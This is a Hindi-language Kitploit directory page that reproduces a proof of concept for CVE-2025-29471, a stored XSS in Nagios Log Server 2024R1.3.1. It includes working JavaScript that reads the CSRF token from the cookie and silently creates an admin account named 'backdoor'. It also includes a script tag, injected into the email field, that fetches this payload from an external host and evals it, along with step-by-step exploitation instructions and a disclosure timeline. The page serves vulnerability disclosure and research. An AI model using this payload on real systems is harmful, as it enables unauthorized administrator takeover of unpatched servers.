Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29471 — Nagios Log Server 2024R1.3.1 में संग्रहीत XSS | Kitploit
उपकरण/GitHubGitHub/skraft9/cve-2025-29471
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubskraft9/cve-2025-29471

CVE-2025-29471

Nagios Log Server 2024R1.3.1 में संग्रहीत XSS

रिपॉजिटरी देखें
135 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Nagios Log Server में स्टोर्ड XSS भेद्यता (व्यवस्थापक के लिए विशेषाधिकार वृद्धि)

▶️ PoC प्रदर्शन

तिथि: 2025-04-02

शोषण लेखक: सेठ क्राफ्ट

विक्रेता होमपेज: https://www.nagios.com/

विक्रेता परिवर्तन सूची: https://www.nagios.com/changelog/#log-server

सॉफ्टवेयर लिंक: https://assets.nagios.com/downloads/nagios-log-server/versions.php

प्रभावित संस्करण: 2024R1.3.1 और निचले

परीक्षण किया गया: Nagios Log Server 2024R1.3.1 (डिफ़ॉल्ट कॉन्फ़िगरेशन, Ubuntu 20.04)

CWE-ID: CWE-79

आधार स्कोर: 8.3 (उच्च)

वेक्टर स्ट्रिंग: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

प्रकार: स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS), विशेषाधिकार वृद्धि


प्राधिकरण

केवल अधिकृत परीक्षण और अनुसंधान उद्देश्यों के लिए। इस भेद्यता का परीक्षण या शोषण उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।


विवरण:

Nagios Log Server 2024R1.3.1 में एक स्टोर्ड XSS भेद्यता एक निम्न-विशेषाधिकार वाले उपयोगकर्ता को अपने प्रोफ़ाइल के 'ईमेल' फ़ील्ड में दुर्भावनापूर्ण JavaScript इंजेक्ट करने की अनुमति देती है।

जब कोई व्यवस्थापक ऑडिट लॉग देखता है, तो पेलोड निष्पादित होता है, जिसके परिणामस्वरूप अनधिकृत व्यवस्थापक खाता निर्माण के माध्यम से विशेषाधिकार वृद्धि होती है।


प्रूफ ऑफ कॉन्सेप्ट

  1. अपने बाहरी सर्वर पर निम्नलिखित सामग्री के साथ xss.js पेलोड होस्ट करें। GitHub ठीक काम करता है।

    <target-ip> को Nagios Log Server लक्ष्य के IP/होस्टनाम से अपडेट करें।

root@kitploit:~
(function() {
  console.log("🔥[XSS] Payload Executing...🔥");

  var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
  if (!csrfTokenMatch) return;
  var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
  console.log("[XSS] CSRF Token:", csrfToken);

  var requestBody = "csrf_ls=" + csrfToken +
    "&name=backdoor" +
    "&[email protected]" +
    "&username=backdoor" +
    "&password=Password123!" +
    "&password2=Password123!" +
    "&auth_type=admin" +
    "&apiaccess=1" +
    "&language=en_US" +
    "&account_type=local";

  fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: requestBody
  })
  .then(response => response.text())
  .then(function(data) {
    console.log("🔥[XSS] User Created Successfully!🔥");
    console.log(data);
  })
  .catch(console.error);
})();
  1. Nagios Log Server में एक मानक (गैर-व्यवस्थापक) उपयोगकर्ता के रूप में लॉग इन करें।

  2. प्रोफ़ाइल अपडेट समापन बिंदु पर जाएं:

    http://<target-ip>/nagioslogserver/profile/update

  3. ईमेल फ़ील्ड में निम्नलिखित पेलोड इंजेक्ट करें। fetch लाइन को उस URL से अपडेट करें जहां xss.js संग्रहीत है।

root@kitploit:~
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
  .then(response => response.text())
  .then(scriptText => eval(scriptText))
  .catch(console.error);
</script>
  1. एक व्यवस्थापक द्वारा ऑडिट लॉग देखने की प्रतीक्षा करें। JavaScript निष्पादित होगा, एक नया व्यवस्थापक खाता बनाते हुए:

उपयोगकर्ता नाम: backdoor

पासवर्ड: Password123!

  1. Nagios Log Server में backdoor के रूप में पूर्ण व्यवस्थापक पहुँच के साथ लॉग इन करें।

प्रकटीकरण समयरेखा

  • 2025-02-07: शोधकर्ता ने Nagios को भेद्यता की सूचना दी
  • 2025-02-14: Nagios ने सुरक्षा रिपोर्ट प्राप्त करने की पुष्टि की
  • 2025-03-03: शोधकर्ता ने Nagios से अद्यतन का अनुरोध किया
  • 2025-03-10: शोधकर्ता ने Nagios से अद्यतन का अनुरोध किया
  • 2025-03-17: Nagios ने पुष्टि की कि भेद्यता का समाधान किया गया है और जल्द ही एक फिक्स जारी करने की योजना है
  • 2025-03-19: Nagios ने Nagios Log Server 2024R2 जारी किया
  • 2025-03-27: शोधकर्ता ने परीक्षण किया और सत्यापित किया कि Nagios Log Server 2024R2 स्टोर्ड XSS भेद्यता को हल करता है और Nagios को अद्यतन किया
  • 2025-04-01: MITRE ने इस स्टोर्ड XSS भेद्यता के लिए CVE-2025-29471 आरक्षित किया, लेकिन विक्रेता से सार्वजनिक सुरक्षा सलाहकार के अभाव के कारण विवरण अप्रकाशित रहे
  • 2025-04-09: Nagios ने 2024R2 फिक्स के लिए एक अनुवर्ती (2024R1.3.2) जारी किया जो स्टोर्ड XSS भेद्यता फिक्स को 2024R1 शाखा में बैकपोर्ट करता है
  • 2025-04-15: CVE-2025-29471 को औपचारिक रूप से प्रकाशित किया गया

अस्वीकरण

यह कार्य मेरी नौकरी के बाहर किया गया था और साइबर सुरक्षा अनुसंधान में मेरे व्यक्तिगत प्रयासों को दर्शाता है।

टूल डाउनलोड करें